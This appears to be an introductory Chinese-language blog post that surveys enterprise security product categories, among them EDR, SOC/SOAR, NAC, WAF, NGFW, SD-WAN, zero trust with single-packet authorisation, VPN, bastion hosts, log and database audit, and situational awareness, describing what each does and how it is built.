安全圈术语全景图
原创
0. 前言
意在提供一个安全厂商产品清单的概况,来开阔安全圈知识广度,文中提到的知识简介和技术框架,仅针对入门用。
1. ESM(终端安全管理系统)
企业信息系统免遭高级持续性攻击和敏感数据免遭丢失或窃取已是当务之急,终端计算机是源头,也是终点。
- 内核文件驱动和网络驱动深度适配 Windows、Linux 操作系统 -> 有能力支持文件类型识别和网络报文深度解析
- 轻量级本地特征库检测常见和流行的恶意软件
- 恶意文件检测引擎通过智能深度学习,真正洞察勒索和挖矿病毒的行为特征,有效检测已知勒索病毒及其家族的未知变种,以高检出率和低误报率的算法模型,构建完整的勒索病毒和挖矿病毒的防御体系
- 客户端可以自动将受感染文件或可疑文件隔离至本地隔离区
- 阻止策略下发,多个端点执行相应的对策
- 操作高清记录 -》 内核态记录“文件操作”、“进程事件”和“注册表操作”,从用户态采集“系统事件”,还通过 DPI(深度报文解析)功能识别并记录超过 1000 种以上的网络协议及应用
- 减少暴露面 -》 资产管理,补丁管理,USB 外设管控,进程管理,日志审计,违规外联
- 统一管理 -》支持上万点客户端规模的部署,并实现策略统一管理,病毒特征库统一下发和威胁日志汇总统一呈现
2. SOC(安全运营中心)
一切围绕着提升安全能力开展的工作都属于安全运营。安全建设仅仅是一个开始,只有运营才能有效提升企业安全防御效果。
安全运营整体框架可分为几个小框架,分别是安全防护框架、安全运维框架、安全验证框架和安全度量框架。
- 安全防护框架的目的是尽可能多的部署有效的安全感知器 Sensor,这些安全感知器构成了信息安全的一个天网。安全 Sensor 会产生大量的监测日志,作为安全运维框架的输入。
- 安全运维框架落地时企业一般会部署像 SIEM 安全大数据平台或类似平台,来实现安全检测信息的统一采集,分析、处理和存储,并通过两种方式进行异常检测告警。-> 异常检测规则 + 基于算法分析(top10、top100,然后再交由二线专家进行分析)
- 安全运维框架 -> 安全事件的流程化处理和定期的 review 汇报 / 安全事件的确认和溯源分析
- 安全验证框架是指建立自动化的验证平台,对安全防护框架的管控措施实现百分百的全面验证
- SOAR 一词全称是 Security Orchestration, Automation and Response,即安全编排和自动化响应,SOAR 的前提是 SOP,只有制定了足够多、足够细的 SOP,才能够有希望实现 SOAR,因此,高质量 SOP 是一线发挥作用的基础
事件名称 | |
|---|---|
事件 ID | |
报告日期 | |
影响概述 | 事件影响级别 |
外部影响描述:内部影响描述: | |
系统信息 | |
系统 IP | |
负责人 | |
事件关键时间 | |
发现时间 | |
安全初查时间 | |
漏洞修复时间 | |
安全复查时间 | |
事件处置过程 | |
处置过程 | 处置步骤 |
1 | |
2 | |
影响分析 | |
法务影响 | 无 |
业务影响 | 无 |
数据影响 | |
安全风险 | 无 |
其他 | 无 |
原因分析 | |
原因分类 | □ 设备设施 □ 应用系统 □ 人员 □ 流程 □ 外部因素 |
原因分析 | |
后续改进 | |
* ① 验证安全 Sensor 安全监测功能是否有效; | |
② 验证安全 Sensor 所产生监测信息到 SIEM 平台的信息采集是否有效; | |
③ 验证 SIEM 平台的安全检测规则是否有效; | |
④ 验证告警方式(邮件、短信与可视化 展示平台)是否有效 | |
* 矩阵式监控,多维度 |
3. EDR(端点检测与响应((Endpoint Detection and Response,EDR))
what:
端点检测和响应是一种主动式端点安全解决方案,通过记录终端与网络事件(例如用户,文件,进程,注册表,内存和网络事件),并将这些信息本地存储在端点或集中数据库。结合已知的攻击指示器(Indicators of Compromise,IOCs)、行为分析的数据库来连续搜索数据和机器学习技术来监测任何可能的安全威胁,并对这些安全威胁做出快速响应。还有助于快速调查攻击范围,并提供响应能力。
安全模型:
(1)资产发现:定期通过主动扫描、被动发现、手工录入和人工排查等多种方法收集当前网络中所有软硬件资产,包括全网所有的端点资产和在用的软件名称、版本,确保整个网络中没有安全盲点。 (2)系统加固:定期进行漏洞扫描、补丁修复、安全策略设置和更新端点软件清单,通过软件白名单限制未经授权的软件运行,通过主机防火墙限制未经授权的服务端口开放,并定期检查和清理内部人员的账号和授权信息。 (3)威胁检测:通过端点本地的主机入侵检测和借助云端威胁情报、异常行为分析、攻击指示器等方式,针对各类安全威胁,在其发生前、发生中、发生后进行相应的安全检测动作。 (4)响应取证:针对全网的安全威胁进行可视化展示,能够针对安全威胁自动化地进行隔离、修复和补救,自动完成安全威胁的调查、分析和取证工作,降低事件响应和取证分析的技术门槛,不需要依赖于外部专家即可完成快速响应和取证分析。
主要技术:
- 沙箱(Sandbox)
- 机器学习
- 大数据分析:为应对 APT 攻击的极强持续性和阶段性,关联分析过程中应尽量收集各层面、各阶段的全方位信息,同时适量将时间窗口拉大,通过宽时间域数据分析提取具有内在关联的若干属性,识别出攻击发生的时间、地点、攻击类型和强度等信息。
- 数字取证:存在于计算机、网络、电子设备等数字设备中的数字证据,进行确认、保护、提取和归档的过程。在 EDR 中,数字取证要克服云计算环境取证、智能终端取证、大数据取证等关键技术,自动定位和采集端点人侵电子证据,降低取证分析的技术门槛,提高取证效率及其分析结果的准确性,为端点安全事件调查、打击网络犯罪提供技术支持。
优点与局限性
- EDR 完整覆盖端点安全防御全生命周期。对于各类安全威胁事件,EDR 在其发生前、发生中、发生后均能够进行相应的安全检测和响应动作。安全事件发生前,实时主动采集端 安全数据和针对性地进行安全加固;安全事件发生时,通过异常行为检测、智能沙箱分析等各类安全引擎,主动发现和阻止安全威胁;安全事件发生后,通过端点数据追踪溯源
- EDR 能够广泛适应传统计算机网络、云计算、边缘计算等各类网络架构,能够适用于各种类型的端点,且不受网络和数据加密的影响。
- EDR 的局限性在于并不能完全取代现有的端点安全防御技术。EDR 与防病毒、主机防火墙、主机入侵检测、补丁加固、外设管控、软件白名单等传统端点安全防御技术属于互补关系,并不是取代关系。
4. 安全U盘
1、U 盘可以实现数据防复制、防拷贝,不同身份使用不同权限
2、U 盘 100% 防病毒,所有数据均通过 api 读写
3、所有数据读写均有日志,可以通过管理员导出日志审计
4、可提供 U 盘策略修改、日志读取接口
5、可以绑定公司内网,U 盘离开公司无法打开使用
防拷贝、防复制: 只能在 U 盘内部打开浏览,无法复制;不能另存为,不能删除格式化;无法通过邮件、网络等方式导出数据。独立的文件系统为数据提供防病毒保护,且分区保护的特性具备完全杜绝数据拷贝窃取的行为。
防截图、防录屏: 禁止截图、录屏软件使用;可设置禁止远程。
多用户管理: 通过新建用户,对不同用户进行不同的权限设置,可依据资料密级划分及对应的使用人员去分配优盘及用户账号密码,并为其配置好相应的权限,方便管理,且不易出错。
可设置自动销毁: 文件保管人需要对保管的文件进行定期清理时,可在策略管理中配置好使用时间、次数等,超过使用时间或次数时,优盘会自动销毁所储存的资料。
可设置绑定台数: 可以通过绑定电脑 IP 地址的方式,进一步限制普通用户的使用。
即插即用: 可以随身携带,不需要安装插件即可使用,无需花费大量时间跟精力对合作方进行使用培训。
策略名称 | 策略功能说明 |
|---|---|
普通 U 盘控制 | 对普通 U 盘设置权限为:禁止使用、允许只读、允许读写。 |
启用 U 盘标签认证 | 打开安全 U 盘功能 |
认证标签列表(添加标签) | 选择设定的标签类型;例如标签 1、标签 2、标签 3 三种标签,分别对应公司内部信息中心、销售部、办公室的安全 U 盘设备。比如,针对信息中心的所有客户端制定一条策略,设置安全 U 盘在信息中心的计算机上的使用权限;设置销售部、办公室的安全 U 盘在信息中心计算机上的使用权限;控制权限范围到数据区(交换区、保密区)。 |
本单位标签认证失败 | 本单位标签,是指安全 U 盘被打上了本单位的标签 |
外单位标签认证失败 | 外单位标签,是非本单位信息的外单位安全 U 盘 |
软盘使用控制、光盘使用控制 | 针对 USB 类型的移动存储设备进行读写控制,USB 软盘、USB 光盘刻录机等是否可以将数据拷出 |
审计过滤 | 针对特定类型的文件进行审计,不设置此项,程序默认为全部审计 |
登录交换区后自动杀毒 | 针对!SAFE6 标签的安全 U 盘插入计算机后自动调用操作系统的杀毒软件对交换区进行病毒查杀,支持动态添加各厂商的杀毒软件设置 |
例外判断 | 针对特定安全 U 盘,如公章系统盘,不进行访问控制判断,其他类似,只需要填写特征文件名即可 |
中间机策略 | 计算机设置过整盘加密策略,此时与外来安全 U 盘进行数据交换时,进行相关的设置 |
5. NAC(网络准入控制)
定义:
只有合法的用户、安全的终端才可以接入网络,隔离非法、不安全的用户和终端,或者仅允许他们访问受限的资源。以此来提升整个网络的安全防护能力。
为什么:
许多重大的安全漏洞往往出现在网络内部,例如园区内部员工在浏览某些网站时,一些间谍软件、木马程序等恶意软件也会不知不觉地被下载到电脑中,并在内网传播,产生严重的安全隐患。因此,在园区网络中,任何一台终端的安全状态(主要是指终端的防病毒能力、补丁级别和系统安全设置)都将直接影响到整个网络的安全。另外,园区网络出现大量非法接入和非授权访问用户时,也会导致业务系统遭受破坏、关键信息资产泄漏的风险。NAC 方案能够有效的管理网络访问权限、及时的更新系统补丁、升级病毒库,让管理员更快捷的查找、隔离及修复不安全的终端,满足园区网络内部的安全需求。
安全能力:
- 身份认证
- 访问控制:根据用户身份、接入时间、接入地点、终端类型、终端来源、接入方式(简称 5W1H)精细匹配用户,控制用户能够访问的资源
- 安全性检查:对终端的安全性(杀毒软件安装、补丁更新、密码强度等)进行扫描,在接入网络前完成终端安全状态的检查。对终端不安全状态能够与网络准入设备进行联动,当发现不安全终端接入网络的时候,能够对这些终端实现一定程度的阻断
- 系统存在安全隐患,NAC 方案提供了系统自动和手动修复升级功能
架构:
- 安全终端:安全终端是安装在用户终端系统上的软件,是对用户终端进行身份认证、安全状态评估以及安全策略实施的主体。
- 网络准入设备:网络准入设备是网络中安全策略的实施点,负责按照客户网络制定的安全策略,实施相应的准入控制(允许、拒绝、隔离或限制)。华为 NAC 方案支持 802.1X、MAC 认证和 Portal 等多种认证方式。在各种认证方式下,网络准入设备辅助用户终端与准入服务器进行认证。网络准入设备可以是交换机、路由器、无线接入点或其它安全设备,通过这些网络准入设备,实现强制用户准入认证、拒绝非法用户的网络访问、隔离不健康终端、为“合法用户、健康终端”提供网络服务的目的。
- 服务器系统:服务器系统包括准入控制服务器、病毒/补丁/软件服务器和业务服务器。准入控制服务器是 NAC 方案的核心,用户在身份认证和安全检查通过前就可以访问,主要负责对用户进行认证和安全审核,实施安全策略,并且与网络准入设备联动,下发用户权限。用户已通过身份认证但终端安全检查未通过时,一般会访问病毒/补丁/软件服务器,进行终端上病毒库的自动更新、操作系统和应用软件的补丁安装和更新等,以满足终端安全检查的要求。业务服务器用于企业业务管理,只有通过认证和授权后的用户才能访问。
6. WAF(Web 应用防火墙)
Web 应用防火墙可以防止 Web 应用免受各种常见攻击,比如 SQL 注入,跨站脚本漏洞(XSS)等。WAF 也能够监测并过滤掉某些可能让应用遭受 DOS(拒绝服务)攻击的流量。WAF 会在 HTTP 流量抵达应用服务器之前检测可疑访问,同时,它们也能防止从 Web 应用获取某些未经授权的数据。
功能 | 简介 |
|---|---|
AI + Web 应用防火墙 | 基于 AI + 规则的 Web 攻击识别,防绕过、低漏报、低误报、精准有效防御常见 Web 攻击,如 SQL 注入、非授权访问、XSS 跨站脚本、CSRF 跨站请求伪造,Webshell 木马上传等 OWASP 定义的十大 Web 安全威胁攻击 |
0day 漏洞虚拟补丁 | 腾讯安全团队 7*24 小时监测,主动发现并响应,24 小时内下发高危 Web 漏洞,0day 漏洞防护虚拟补丁,受护用户无需任何操作即可获取紧急漏洞、0day 漏洞攻击防护能力,大大缩短漏洞响应周期 |
网页防篡改 | 用户可设置将核心网页内容缓存云端,并对外发布缓存中的网页内容,实现网页替身效果,防止网页篡改给组织带来负面影响 |
数据防泄漏 | 通过事前服务器应用隐藏,事中入侵防护及事后敏感数据替换隐藏策略,防止后台数据库被黑客窃取 |
CC 攻击防护 | 智能 CC 防护,综合源站异常响应情况(超时、响应延迟)和网站行为大数据分析,智能决策生成防御策略。多维度自定义精准访问控制、配合人机识别和频率控制等对抗手段,高效过滤垃圾访问及缓解 CC 攻击问题 |
爬虫 BOT 行为管理 | 基于 AI + 规则库的网页爬虫及 BOT 机器人管理,协助企业规避恶意 BOT 行为带来的站点用户数据泄露、内容侵权、竞争比价、库存查取、黑产 SEO、商业策略外泄等业务风险问题 |
API 安全 | 指保护应用程序编程接口(API)不受恶意攻击或滥用的措施,通过主动学习的方式自动发现业务访问中存在的 API 接口,帮助用户快速梳理网络中的已知与未知 API 资产并进行分类分级,构建 API 画像清单;同时,基于威胁检测与数据识别引擎,提供攻击防护、盗用防护、滥用防护和数据保护等能力。 |
30 线 BGP IP 接入防护 | WAF 支持防护节点 30 线独享 BGP IP 链路接入,节点智能调度,有效解决访问延迟问题,保障不同城市用户的站点访问速度,实现网站访问速度影响无感知的云 WAF 安全防护部署 |
- SaaS 型 WAF
用户在 WAF 上添加防护域名并设置回源信息后,WAF 将为防护域名分配唯一的 CNAME 地址。用户可以通过修改 DNS 解析,将原来的 A 记录 修改为 CNAME 记录,并将防护域名流量调度到 WAF 集群。WAF 集群对防护域名进行恶意流量检测和防护后,将正常流量回源到源站,保护网站安全。
- 负载均衡型 WAF
WAF 通过配置域名和腾讯云七层负载均衡(监听器)集群进行联动,对经过负载均衡的 HTTP/HTTPS 流量进行旁路威胁检测和清洗,实现业务转发和安全防护分离,最大限度减少安全防护对网站业务的影响,保护网站稳定运行。
负载均衡型 WAF 提供两种流量处理模式:
镜像模式:通过域名进行关联,CLB` 镜像流量到 WAF 集群,WAF 进行旁路检测和告警,不返回请求可信状态。
清洗模式:通过域名进行关联,CLB 镜像流量到 WAF 集群,WAF 进行旁路检测和告警,同步请求可信状态,CLB 集群根据状态对请求进行拦截或放行处理。
7. NGFW(Next Generation Firewall 传统状态防火墙和统一威胁管理(UTM)设备的下一代产品)
Reference:https://info.support.huawei.com/info-finder/encyclopedia/zh/NGFW.html
Gartner把NGFW看做不同信任级别的网络之间的一个线速(wire-speed)实时防护设备,能够对流量执行深度检测,并阻断攻击。Gartner认为,NGFW必须具备以下能力:
- 传统的防火墙功能NGFW是新环境下传统防火墙的替代产品,必须前向兼容传统防火墙的基本功能,包括包过滤、协议状态检测、NAT、VPN等。
- 应用识别与应用控制技术具备应用感知能力,并能够基于应用实施精细化的安全管控策略和层次化的带宽管理手段,是NGFW引进的最重要的能力。传统的状态检测防火墙工作在二到四层,不会对报文的载荷进行检查。NGFW能对七层检测,可以清楚地呈现网络中的具体业务,并实行管控。
- IPS与防火墙深度集成NGFW要支持IPS功能,且实现与防火墙功能的深度融合,实现1+1>2的效果。Gartner特别强调IPS与防火墙的“集成”而不仅仅是“联动”。例如,防火墙应根据IPS检测到的恶意流量自动更新下发安全策略,而不需要管理员的介入。换言之,集成IPS的防火墙将更加智能。Gartner发现,NGFW产品和独立IPS产品的市场正在融合,尤其是在企业边界的部署场景下,NGFW正在吸收独立IPS产品的市场。
- 利用防火墙以外的信息,增强管控能力防火墙能够利用其他IT系统提供的用户信息、位置信息、漏洞和网络资源信息等,帮助改进和优化安全策略。例如,通过集成用户认证系统,实现基于用户的安全策略,以应对移动办公场景下,IP地址变化带来的管控难题。
防火墙从诞生那一天起,就是紧跟着网络演进的步伐亦步亦趋的。
包过滤防火墙、状态检测防火墙、UTM设备、NGFW发展史
- 早期的包过滤防火墙仅实现访问控制就可以满足初期网络隔离的诉求。
- 随后的状态检测防火墙(也称为传统防火墙)集成了TCP/UDP和应用状态的检测能力,实现了L3-L4层的防护。它引入了策略的概念,把处理的目标从包转向了流,从而拥有更高的处理效率。
- 2004年出现了将传统防火墙、内容安全(防病毒、IPS和URL过滤等)和VPN等功能集合到一起的UTM设备。每个模块独立运行,每次检测都需要重新拆包检查,检测效率并没有得到提升。但是UTM的出现在一定程度上简化了安全产品部署的难度,比较适合小中型企业。
- 由于WEB应用越来越多,应用和端口、协议之间的关系也越来越复杂。同样是使用HTTP协议,有人可能在查学习资料,有人可能在玩游戏。所以光靠“五元组”来标识流量的传统防火墙已经无法看清网络中的流量了。此时,拥有应用识别技术的NGFW应运而生,它可以区分流量对应的应用,即使这些应用出使了同一种协议、端口。而且NGFW将IPS、病毒防护等多种安全业务与防火墙业务深度集成,并行处理,解决了UTM设备需要逐个模块处理报文,性能低下的问题。不过,大部分情况下,UTM和NGFW不包含Web应用防火墙(WAF)的能力。
传统防火墙、UTM设备、NGFW能力对比
8. SD-WAN
Reference:https://zhuanlan.zhihu.com/p/87281219 & https://www.sdnlab.com/24498.html
SD-WAN之前,处理公司网络流量的主要方法是分支机构通过租用线路与公司数据中心或总公司联系,通常使用MPLS(它就是在数据流上打标签,有点像鸡毛信,告诉沿路的所有设备:“我是谁,我要去哪里”。)。这种方式约占公司网络流量的80%,其中WAN路由器是基于硬件的、专有的、昂贵且相对不灵活(部署周期长,排查问题难)。
MPLS专线是一种租用服务,它的所有权是属于电信运营商的。运营商把专线租给你,然后承诺这条线路的SLA(Service Level Agreement,服务等级协议,包括带宽、时延、抖动、丢包率等) 能达到什么样的要求。
问题又来了,你租我租大家租,运营商的物理网络就这么一张,这么多公司的业务都在上面跑,怎么保证区分和隔离呢?
本地SD-WAN架构:
大家可以看到,整个网络架构的躯干,其实还是Internet和MPLS专线。但是,在架构之上,多了一个SD-WAN控制器。这个控制器,就是SD-WAN的管理控制核心。 在分公司节点,还有总部节点,多了一些uCPE和vCPE这样的东西(SD-WAN Edge设备)。
云SD-WAN架构:云SD-WAN架构允许SD-WAN Edge设备连接到基于云的SD-WAN网关。SD-WAN提供实时流量调整、多电路负载平衡、故障转移以及对云应用程序的访问。云网关可由各种云提供商应用程序托管,包括Office 365,Salesforce和Dropbox。企业可以通过让关键的基于云的内部实时应用在小型MPLS管道上运行,让其他应用在公共互联网上运行来降低成本。
云骨干架构使SD-WAN Edge设备连接到最近的网络POP点,这时流量将跳到MPLS上,并且还将拥有专线的SLA质量。大多数MPLS管道直接连接到主要的云提供商,这提高了这些应用程序的性能和可靠性。对于那些想要拥有完整SD-WAN架构但仍然担心宽带服务质量的公司来说,这种部署方法是可以使用的。该架构将非关键应用offload到低成本宽带网络中,从而为关键业务应用分配了更多带宽,进而提高了所有应用程序的性能。
9. 上网行为管理
价值:
- 规范上网行为:通过精细化的审计机制和海量的行为特征库,针对员工进行上网行为和内容管理,严格控制访问权限,禁止非法和娱乐行为,规范用户上网行为,提升员工工作效率,营造“绿色”安全办公环境。
- 审计、合规场景:上网内容本地留存,数据清晰易懂,帮助管理清晰了解内网行为态势;帮助公司响应国家政策要求,满足法规的审计要求。
- 出口网关场景:具备高性能的NAT机制,为内外网用户访问资源保驾护航;具备丰富的多出口选路机制,融合业务需求,增强业务、数据的可靠性;提供边界安全防护,有效过滤非法访问行为。
- 智能化带宽管理:优先保障组织关键业务,限制员工P2P行为,保障组织业务的连续性和稳定性;智能分配空闲时带宽资源,提升带宽使用效率;对用户流量“套餐”定制,分配指定流量套餐,对“套餐”超额的用户进行人性化带宽。
主要依赖技术:https://github.com/ntop/nDPI + app identify(应用特征流多模匹配+机器学习+url标签)+ 策略
10. 零信任
传统的安全模型通过 “一次验证+静态授权” 的方式评估实体风险,而零信任基于 “持续验证+动态授权” 的模式构筑企业的安全基石。
- 业务上云后各种数据的集中部署打破了数据的边界,同时放大了静态授权的管控风险,数据滥用风险变大。高低密级数据融合导致权限污染,被动抬高整体安全等级,打破安全和业务体验的平衡。
- 资源从分散到云化集中管理,按需部署。由于当前安全管控策略分散、协同水平不高,云端主机一旦受到攻击,攻击将难以快速闭环,很难形成全局防御。
零信任是应对上述挑战的重要方法。采用零信任方案可以统一身份管理,构筑身份边界,实时感知风险,实现动态和细粒度授权。
- 将身份作为访问控制的基础
- 最小权限原则
- 实时计算访问控制
- 资源受控安全访问
- 基于多源数据进行信任等级持续评估
关键技术:
SDP(软件定义边界技术)-》 SPA (单包授权)
SDP特点:
- 预验证,预授权
- 应用级别的访问准入
- 网络隐身:spd服务器不对外暴露dns,ip接口,必须通过sdp专用客户端使用专有的协议才能连接
SPA特点:
单包授权技术可以看作是端口敲门技术的演进,两者具有相同的目标,但实现方式却有很大不同。端口敲门使用多个数据包进行敲门,SPA则如名字所示,使用单个数据包进行访问申请,避免了敲门过程中因丢包等因素引起的失败。SPA通过将所有必要信息集成在单个数据包(通常为UDP)内来简化流程。
数据包内信息一般包含:
- 时间戳:
- 客户端IP
- 服务密码
图2 单包授权数据包流程
图3 单包授权过程
SPA运行过程如图2、图3所示,在这个简单的SPA案例中,客户端将发包时的时间戳(日期、小时、分钟)、客户端IP(UDP报头内)和服务密码组合在一起,生成哈希值。将哈希值打包成UDP数据包发送到服务器指定敲门端口。服务器根据接收到UDP报头内时间戳、客户端IP以及服务器内部存储的服务密码生成哈希值,与接收到的哈希值进行对比,如果相同,则为客户端打开申请访问的服务端口。服务器将记录它收到的最后一个有效授权的数据包,以防止攻击者发送旧的数据包进行重放攻击如果哈希值不匹配或者与此前收到的有效哈希值相同,则不执行任何操作。
在实际通信中,开源程序Firewall Knock Operator (fwknop),实现了基于UDP的单包授权方案,也支持TCP和ICMP。fwknop通过加密打包用户名、访问端口、时间戳等信息,发送到对应敲门端口,服务器识别后开启访问端口来实现SPA。
11. SSL VPN(虚拟专用网路Virtual Private Network)
what
虚拟专用网VPN(Virtual Private Network)是依靠Internet服务提供商ISP(Internet Service Provider)和网络服务提供商NSP(Network Service Provider)在公共网络中建立的虚拟专用通信网络,可以满足企业对网络的灵活性、安全性、经济性、扩展性等方面的要求。
两种模式
- 远程访问
正常情况下,当您在浏览器输入你的目标访问地址 http://youtube.com,那么此信息会浏览器发送到协议栈并由其打包成 Packet 并交给正常网卡,进而由网卡把包转换成电信号通过网线发出去,而这一切都是 ISP、政府等通过真实 IP 地址可见的。有了 VPN 的存在,上面我们有提到,因为整个设备会多出一个 VPN 创建的虚拟网卡,那么原始数据包会由 VPN协议(如 PPTP, OpenVPN)进行重新封装(IP 头地址会变成所选 VPN 服务器的所属地址)并加密,然后通过虚拟网卡进行发送,这样一来任何第三方都是无法知道你的具体访问网址和行为。这样 VPN 的使用,不论从隐私性、安全性还是网络自由的角度来说,都是益处多多的。当Web 服务器接受处理请求并将目标信息返回时,一切数据依旧是被 VPN 所加密,所以全程保护,无需担心
- 站点互联
远程访问 VPN 可用于个人和公司,需要使用客户端软件和网关来对某个特定的网络进行连接。而站点到站点 VPN 是公司级工具,所有位置都会使用同一个共享网关,无需安装客户端,通过身份验证即可轻松连接。
组件:
VPN不是一种简单的高层业务,它要比普通的点到点应用复杂得多。VPN的实现需要建立用户之间的网络互联,包括建立VPN内部的网络拓扑、进行路由计算、维护成员的加入与退出等。因此,VPN体系结构较复杂,可以概括为以下三个组成部分:
- VPN隧道:包括隧道的建立和管理。
- VPN管理:包括VPN配置管理、VPN成员管理、VPN属性管理(管理服务提供商边缘设备PE上多个VPN的属性,区分不同的VPN地址空间)、VPN自动配置(指在二层VPN中,收到对端链路信息后,建立VPN内部链路之间的对应关系)。
- VPN信令协议:完成VPN中各用户网络边缘设备间VPN资源信息的交换和共享(对于L2VPN,需要交换数据链路信息;对于L3VPN,需要交换路由信息;对于VPDN,需要交换单条数据链路直连信息),以及在某些应用中完成VPN的成员发现。
实现模式:
- 设备CE1发送用户报文给设备PE1。
- 设备PE1收到报文后,根据网络管理员设置的规则,对数据进行加密或直接传输。
- 对需要加密的数据,PE1将用户的整个数据包(包括源IP地址和目的lP地址等)进行加密并附上数据签名,然后再封装上新的数据报文头(包含隧道标签、安全等信息)。对于不需要加密的数据,PE1直接封装上新的数据报文头(包含隧道标签T等信息)。
- PE1将封装好的数据包通过公网隧道发送给远端设备PE2。
- PE2收到数据包后,校验目的IP地址是自己,然后解封装,对于加密的数据,核对数字签名无误后,对数据包进行解密,然后发给用户CE2。对于未加密的数据,直接发给用户CE2。
12. 日志审计 LAS(Log Audit System)
基于大数据架构的综合日志管理平台,通过大数据技术的海量日志采集、异构设备日志范式化及安全事件关联分析,实现日志全生命周期管理。协助运维人员从事前(发现安全风险)、事中(分析溯源)及事后(调查取证)等多个维度监控网络安全事件,助力企业满足《网络安全法》及等保合规要求。
功能
- 日志采集:全面支持Syslog、SNMP日志协议,可以覆盖主流硬件设备、主机及应用,保障日志信息的全面收集。实现信息资产(网络设备、安全设备、主机、应用及数据库)的日志获取,并通过预置的解析规则实现日志的解析、过滤及聚合。
- 日志格式统一化处理:日志审计系统支持针对不同格式的日志信息解析提取关键信息完成日志信息的过滤、日志合并和日志格式的统一化规整,规整后的日志字段包括日志接收时间 、日志产生时间、日志持续时间、用户名称、源地址、源MAC地址、源端口、操作、目的地址 、目的MAC地址、目的端口、日志的事件名称、摘要、等级、原始等级等等,使规整后的日志简单易懂便于分析,统一化处理的日志格式可通过导入解析文件的方式灵活扩展。
- 日志分析:系统提供基于规则的日志信息关联分析技术对海量日志数据进行多维度关联分析,第一时间发现网络中发生或隐藏的各类安全事件、安全威胁。系统内置大量的日志分析规则,并提供可视化的规则自定义配置界面,方便管理员快捷的制定针对安全事件关联分析的过滤规则、关联分析规则以及相对应安全事件的告警方式等。
- 告警展示:日志审计提供安全告警能力,多维度图形化展示告警信息概况,以时间为轴线展示告警发展趋势以及列表展示告警详情。帮助管理员直观掌握网络环境安全现状,并对未来网络安全形势进行相应评估。告警信息实时刷新,管理员可通过多维度多条件的查询告警信息,准确定位实时安全事件来源。
- 日志检索:支持通过任意字段从数以百亿级的日志信息中检索所需要的日志内容,并提供丰富的日志检索模板,让日志查询简单、易用。此外支持查询结果下钻上卷,支持原始日志与归一化日志同屏显示。支持查询结果显示界面快捷统计。
- 数据存储:可根据制定的存储策略存储指定时间内的或一定空间容量的日志信息,可通过制定日志备份策略和日志空间告警阈值保障日志信息的可用性。
- 合规监管:日志留存满足《网络安全法》、《数据安全法》相关要求,推动等保合规。
产品部署
通过Region Boss下单后自动为租户创建云堡垒机服务实例,通过标准syslog实现日志收集,其中linux系统、网络产品、安全产品可通过设置syslog日志服务器地址发送日志,windows操作系统需安装agent进行日志采集。
界面信息:
13. 堡垒机
what:
堡垒机,即在一个特定的网络环境下,为了保障网络和数据不受来自外部和内部用户的入侵和破坏,而运用各种技术手段监控和记录运维人员对网络内的服务器、网络设备、安全设备、数据库等设备的操作行为,以便集中报警、及时处理及审计定责。
用一句话来说,堡垒机就是用来后控制哪些人可以登录哪些资产(事先防范和事中控制),以及录像记录登录资产后做了什么事情(事溯源)
从跳板机演化而来,更加符合权限可控+行为可控(4A:认证(Authen)、授权(Authorize)、账号(Account)、审计(Audit))
目标:
- 审计:你做了什么?(What)
- 授权:你能做哪些?(Which)
- 账号:你要去哪?(Where)
- 认证:你是谁?(Who)
- 来源:访问时间?(When)
组件:
开源版本:jumpserver
14. 数据库审计(DBAudit)
数据库审计是指对数据库的操作进行跟踪、记录、分析和报告的过程。通过数据库审计,可以监控数据库的访问和操作,及时发现并应对安全事件。数据库审计可以记录用户登录、查询、修改、删除等操作,以及操作的时间、地点、来源等信息,以便进行安全审计和监控。
目的:
- 安全审计:对数据库的安全措施进行审计,包括访问控制、数据加密、漏洞修补等。安全审计可以发现数据库的安全漏洞和弱点,及时采取措施进行修补和优化。
- 操作审计:对数据库的操作进行审计,包括用户登录、查询、修改、删除等操作。操作审计可以发现非法访问和操作,及时发现和应对安全事件。
- 数据审计:对数据库中的数据进行审计,包括数据的创建、修改、删除等操作。数据审计可以发现数据泄露和篡改等安全问题,及时采取措施进行处理和恢复。
- 性能审计:对数据库的性能进行审计,包括数据库的负载、响应时间、资源使用情况等。性能审计可以发现数据库的性能问题和瓶颈,优化数据库的配置和运维,提高数据库的运行效率和稳定性。
- 合规性审计:对数据库的合规性进行审计,包括符合相关法规和标准。合规性审计可以发现不符合标准的问题,及时采取措施进行整改和优化。
基本组件
- 日志记录:记录数据库的各种操作和事件,包括登录、查询、修改、删除等操作,以及安全事件和系统事件等。日志记录是数据库审计的基础。
- 审计策略:制定数据库审计策略,包括审计的内容、范围、频率、记录方式等。审计策略应该根据实际需求和安全风险进行定制,以确保审计的有效性和适应性。
- 审计分析:对数据库的审计日志进行分析和解读,发现异常行为和安全事件,并及时采取相应的措施。审计分析可以采用日志分析工具、安全警报等技术来实现。
- 审计报告:定期生成数据库审计报告,包括审计的结果、问题和建议等。审计报告可以帮助企业及时发现和解决安全问题,提高安全意识和防范能力。
15. 网络态势感知(Cyberspace Situation Awareness,CSA)
Reference:https://www.freebuf.com/articles/es/197268.html
在大规模网络环境中对能够引起网络态势发生变化的安全要素进行获取、理解、显示以及最近发展趋势的顺延性预测,而最终的目的是要进行决策与行动。
(1)态势感知是了解当前的状态,包括状态识别与确认(攻击发现),以及对态势感知所需信息来源和素材的质量评价。
(2)态势理解则包括了解攻击的影响、攻击者(对手)的行为和当前态势发生的原因及方式。简单可概括为:损害评估、行为分析(攻击行为的趋势与意图分析)和因果分析(包括溯源分析和取证分析)。
(3)态势预测则是对态势发展情况的预测评估,主要包括态势演化(态势跟踪)和影响评估(情境推演)
在传统的防御思维里,我们会在安全事件发生之后去取证,溯源,可是对客户造成的损失已经无法弥补,所以我们需要的在事件发生中,甚至发生前去感知到,进一步有针对性地进行防御。
为什么态势感知平台可以做到呢?因为平台背后的专家们能够在以前的安全事件中溯源获取经验,包括各种攻击手段的特征如可执行文件的行为,异常的流量等;在大量数据中提取出特征,这一工作在大数据相关技术发展之前是很难实现的,而现在可以用大数据的方法处理以前积累起来的数据;可以和其他传统产品打通接口,通过各种数据多维度地进行准备分析,包括刻画攻击者画像、攻击路线等。甚至,通过画像的分析,态势感知平台可以分析出攻击服务器的是一个脚本小子,还是APT组织,如果是脚本小子,那就由他弄好了,也不会造成什么危害,如果是APT,则需要应急响应了。当然这些规则一方面需要专家根据经验得出,一方面由AI来学习得出。
